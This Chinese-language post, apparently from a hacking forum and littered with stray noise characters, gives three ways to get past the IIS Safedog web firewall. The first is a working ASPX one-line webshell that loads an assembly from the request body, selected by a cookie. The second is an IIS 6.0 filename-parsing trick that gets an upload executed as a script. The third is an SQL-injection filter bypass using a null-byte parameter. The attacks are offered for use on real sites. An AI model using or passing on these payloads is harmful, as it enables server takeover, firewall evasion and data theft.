1、绕过IIS安全狗的一句话。
2 Y+ n& Z1 E' M i3 V前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。+ ]9 \% {- ?) f9 h2 g9 x5 h
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
' {5 c+ z% K$ |* s7 X; y$ K# N
2、IIS6.0解析漏洞遇到安全狗。
# c I+ r$ t. d文件名为% L; m" ]. N! I: Q
http://www.xxxxx.com/sh3llc0de.asp;1.jpg7 \7 p; t7 V) k: j2 O
8 h: ~0 b! m2 V& Z3 p' O这样的会被IIS安全狗果断屏蔽。
3 R3 r7 N7 W/ X改成如下名称,IIS6一样会解析:
7 J3 e- ]5 |. ]$ p1 v) xwww.xxxxx.com/;1.asp;1.jpg
: P: d' _( o3 w; ~+ ]
6 F: n9 q& b6 o7 e% T' |. W7 ^+ z3、安全狗的注入绕过。
) { s4 z$ g' M# G6 H* N常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。- i/ X" v7 Y! t
但如果:
/ ]: Q5 r, o$ M4 D5 D; D- R |9 ar00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
/ x. {0 A% }0 |' A3 r就可以成功绕过了。
# _! y, \( l1 _0 U7 C, w. M+ u! Y- f2 Q# S7 P# t5 O% }
) K! K: f7 m) J& ]6 `7 o: S$ O
|